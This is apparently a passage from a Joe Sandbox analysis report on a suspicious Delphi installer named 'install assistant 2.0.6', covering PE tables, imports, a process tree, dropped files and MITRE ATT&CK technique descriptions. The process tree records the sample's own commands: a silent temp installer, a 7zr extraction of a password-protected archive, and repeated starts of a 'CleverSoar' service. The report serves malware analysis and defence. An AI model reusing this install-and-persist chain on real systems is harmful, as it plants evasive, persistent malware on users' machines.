IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb52d4	0x25c	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xb6000	0x1a4	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa568c	0xa5800	b889d302f6fc48a904de33d8d947ae80	False	0.3620185045317221	data	6.377190161826806	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0xa7000	0x1b64	0x1c00	588dd0a8ab499300d3701cbd11b017d9	False	0.548828125	data	6.109264411030635	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xa9000	0x3838	0x3a00	5c0c76e77aef52ebc6702430837ccb6e	False	0.35338092672413796	data	4.95916338709992	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xad000	0x7258	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xb5000	0xfec	0x1000	627340dff539ef99048969aa4824fb2d	False	0.380615234375	data	5.020404933181373	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0xb6000	0x1a4	0x200	fd11c1109737963cc6cb7258063abfd6	False	0.34765625	data	2.729290535217263	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0xb7000	0x71	0x200	7de8ca0c7a61668a728fd3a88dc0942d	False	0.1796875	data	1.305578535725827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0xb8000	0x18	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xb9000	0x5d	0x200	d84006640084dc9f74a07c2ff9c7d656	False	0.189453125	data	1.3892750148744617	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xba000	0x10fa8	0x11000	a85fda2741bd9417695daa5fc5a9d7a5	False	0.5789579503676471	data	6.709466460182023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xcb000	0x11000	0x11000	85eb1c4931e9d0b4430fde2d42f1c51b	False	0.187744140625	data	3.723418370548741	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xcb678	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2048	English	United States	0.1174924924924925
RT_ICON	0xcc0e0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.15792682926829268
RT_ICON	0xcc748	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.23387096774193547
RT_ICON	0xcca30	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.39864864864864863
RT_ICON	0xccb58	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors	English	United States	0.08339210155148095
RT_ICON	0xce180	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.1023454157782516
RT_ICON	0xcf028	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.10649819494584838
RT_ICON	0xcf8d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.10838150289017341
RT_ICON	0xcfe38	0x12e5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.8712011577424024
RT_ICON	0xd1120	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.05668398677373642
RT_ICON	0xd5348	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08475103734439834
RT_ICON	0xd78f0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.09920262664165103
RT_ICON	0xd8998	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.2047872340425532
RT_STRING	0xd8e00	0x3f8	data			0.3198818897637795
RT_STRING	0xd91f8	0x2dc	data			0.36475409836065575
RT_STRING	0xd94d4	0x430	data			0.40578358208955223
RT_STRING	0xd9904	0x44c	data			0.38636363636363635
RT_STRING	0xd9d50	0x2d4	data			0.39226519337016574
RT_STRING	0xda024	0xb8	data			0.6467391304347826
RT_STRING	0xda0dc	0x9c	data			0.6410256410256411
RT_STRING	0xda178	0x374	data			0.4230769230769231
RT_STRING	0xda4ec	0x398	data			0.3358695652173913
RT_STRING	0xda884	0x368	data			0.3795871559633027
RT_STRING	0xdabec	0x2a4	data			0.4275147928994083
RT_RCDATA	0xdae90	0x10	data			1.5
RT_RCDATA	0xdaea0	0x310	data			0.6173469387755102
RT_RCDATA	0xdb1b0	0x2c	data			1.2045454545454546
RT_GROUP_ICON	0xdb1dc	0xbc	data	English	United States	0.6170212765957447
RT_VERSION	0xdb298	0x584	data	English	United States	0.2797450424929179
RT_MANIFEST	0xdb81c	0x7a8	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3377551020408163

Imports

DLL	Import
kernel32.dll	GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll	InitCommonControls
user32.dll	CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll	SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
advapi32.dll	ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

Exports

Name	Ordinal	Address
__dbk_fcall_wrapper	2	0x40fc10
dbkFCallWrapperAddr	1	0x4b063c

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	07:03:11
Start date:	24/12/2024
Path:	C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe"
Imagebase:	0x180000
File size:	8'206'704 bytes
MD5 hash:	C5C5262B26879C84D470EF4A5B73663D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Target ID:	6
Start time:	07:03:13
Start date:	24/12/2024
Path:	C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp" /SL5="$30452,7252309,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe" /VERYSILENT
Imagebase:	0xbe0000
File size:	3'366'912 bytes
MD5 hash:	65559DDD30465F50270FB7E9EE6E6C7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Target ID:	12
Start time:	07:03:17
Start date:	24/12/2024
Path:	C:\Program Files (x86)\Windows NT\7zr.exe
Wow64 process (32bit):	true
Commandline:	7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Imagebase:	0x750000
File size:	831'200 bytes
MD5 hash:	84DC4B92D860E8AEA55D12B1E87EA108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	25
Start time:	07:03:18
Start date:	24/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc start CleverSoar
Imagebase:	0x7ff6a7210000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	45
Start time:	07:03:19
Start date:	24/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c start sc start CleverSoar
Imagebase:	0x7ff674ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	66
Start time:	07:03:20
Start date:	24/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c start sc start CleverSoar
Imagebase:	0x7ff674ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	84
Start time:	07:03:21
Start date:	24/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c start sc start CleverSoar
Imagebase:	0x7ff674ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	105
Start time:	07:03:22
Start date:	24/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c start sc start CleverSoar
Imagebase:	0x7ff674ad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15.8%
Total number of Nodes:	778
Total number of Limit Nodes:	10

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #U5b89#U88c5#U52a9#U624b2.0.6.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Windows NT\7zr.exe

C:\Program Files (x86)\Windows NT\file.bin (copy)

C:\Program Files (x86)\Windows NT\hrsw.vbc

C:\Program Files (x86)\Windows NT\is-PQ622.tmp

C:\Program Files (x86)\Windows NT\is-V197H.tmp

C:\Program Files (x86)\Windows NT\locale.bin

C:\Program Files (x86)\Windows NT\locale.dat

C:\Program Files (x86)\Windows NT\locale2.bin

C:\Program Files (x86)\Windows NT\locale2.dat

C:\Program Files (x86)\Windows NT\locale3.bin

C:\Program Files (x86)\Windows NT\locale3.dat

C:\Program Files (x86)\Windows NT\locale4.bin

C:\Program Files (x86)\Windows NT\locale4.dat

C:\Program Files (x86)\Windows NT\locale7.bin

C:\Program Files (x86)\Windows NT\locale7.dat

C:\Program Files (x86)\Windows NT\res.dat

C:\Program Files (x86)\Windows NT\tProtect.dll

C:\Program Files (x86)\Windows NT\task.xml

C:\Program Files (x86)\Windows NT\trash

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jiv1z5c.eg5.psm1

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b2.0.6.exe

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre